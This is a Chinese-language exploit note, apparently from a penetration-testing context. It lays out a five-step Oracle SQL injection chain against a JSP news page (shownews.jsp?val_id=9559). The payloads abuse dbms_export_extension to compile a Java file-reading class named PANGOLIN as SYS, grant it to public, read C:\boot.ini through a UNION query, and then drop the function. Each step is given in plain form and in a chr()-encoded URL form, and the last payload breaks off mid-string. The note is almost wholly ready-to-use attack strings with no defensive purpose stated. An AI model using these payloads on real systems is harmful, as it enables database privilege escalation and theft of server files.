读文件： 

语句太长ie问题，会显示缺失右括号

 第一步：

 /shownews.jsp?val_id=9559 and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''create or replace and compile java source named "PANGOLIN" as import java.io.*;public class PANGOLIN extends Object { public static String readFile(String filename){  try{BufferedReader myReader= new BufferedReader(new FileReader(filename));   String stemp,str="";   while ((stemp = myReader.readLine()) != null)    str +=stemp+"\n";   myReader.close();return str;  }  catch (Exception e){   return e.toString();  } }}'';END;';END;--,SYS,0,1,0) and 1=1

 

 /shownews.jsp?val_id=9559%20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(99)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(112)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(32)%7C%7Cchr(99)%7C%7Cchr(111)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(111)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(100)%7C%7Cchr(32)%7C%7Cchr(34)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(71)%7C%7Cchr(79)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(34)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(105)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(46)%7C%7Cchr(42)%7C%7Cchr(59)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(98)%7C%7Cchr(108)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(32)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(115)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(71)%7C%7Cchr(79)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(79)%7C%7Cchr(98)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(98)%7C%7Cchr(108)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(32)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(70)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(41)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(121)%7C%7Cchr(123)%7C%7Cchr(66)%7C%7Cchr(117)%7C%7Cchr(102)%7C%7Cchr(102)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(100)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(109)%7C%7Cchr(121)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(61)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(119)%7C%7Cchr(32)%7C%7Cchr(66)%7C%7Cchr(117)%7C%7Cchr(102)%7C%7Cchr(102)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(100)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(40)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(119)%7C%7Cchr(32)%7C%7Cchr(70)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(40)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(41)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(44)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(61)%7C%7Cchr(34)%7C%7Cchr(34)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(119)%7C%7Cchr(104)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(40)%7C%7Cchr(40)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(32)%7C%7Cchr(61)%7C%7Cchr(32)%7C%7Cchr(109)%7C%7Cchr(121)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(46)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(76)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(41)%7C%7Cchr(32)%7C%7Cchr(33)%7C%7Cchr(61)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(117)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(41)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(43)%7C%7Cchr(61)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(43)%7C%7Cchr(34)%7C%7Cchr(92)%7C%7Cchr(110)%7C%7Cchr(34)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(109)%7C%7Cchr(121)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(46)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(125)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(99)%7C%7Cchr(104)%7C%7Cchr(32)%7C%7Cchr(40)%7C%7Cchr(69)%7C%7Cchr(120)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(112)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(41)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(46)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(125)%7C%7Cchr(9)%7C%7Cchr(125)%7C%7Cchr(125)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1

 ------------------------------------------------------------------------------------------

 第二步：

 /shownews.jsp?val_id=9559 and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''create or replace function readFile(filename in varchar2)  return varchar2  as language java name ''''PANGOLIN.readFile(java.lang.String) return String'''';'';END;';END;--,SYS,0,1,0) and 1=1

 

 

 /shownews.jsp?val_id=9559%20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(99)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(112)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(102)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(70)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(99)%7C%7Cchr(104)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(50)%7C%7Cchr(41)%7C%7Cchr(32)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(99)%7C%7Cchr(104)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(50)%7C%7Cchr(32)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(117)%7C%7Cchr(97)%7C%7Cchr(103)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(71)%7C%7Cchr(79)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(46)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(70)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(46)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(41)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1

 -------------------------------------------------------------------------------------------

 第三步：

 /shownews.jsp?val_id=9559 and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''grant all on readFile to public'';END;';END;--,SYS,0,1,0) and 1=1

 

 /shownews.jsp?val_id=9559%20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(103)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(32)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(70)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(32)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(98)%7C%7Cchr(108)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1

 ----------------------------------------------------------------------------------------

 第四步：

sys.readfile(C:\boot.ini)

 /shownews.jsp?val_id=9559  and 1=2 union all select chr(94)%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Csys.readfile(chr(67)%7C%7Cchr(58)%7C%7Cchr(92)%7C%7Cchr(98)%7C%7Cchr(111)%7C%7Cchr(111)%7C%7Cchr(116)%7C%7Cchr(46)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(105))%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Cchr(94),null,null,null  from dual where 1=1 --

 

------------------------------------------------------------------------------------------

第五步：

 /shownews.jsp?val_id=9559 and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''drop function readFile;'';END;';END;--,SYS,0,1,0) and 1=1

 

 

 /shownews.jsp?val_id=9559%20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(100)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(112)%7C%7Cchr(32)%7C%7Cchr(102)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(70)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7C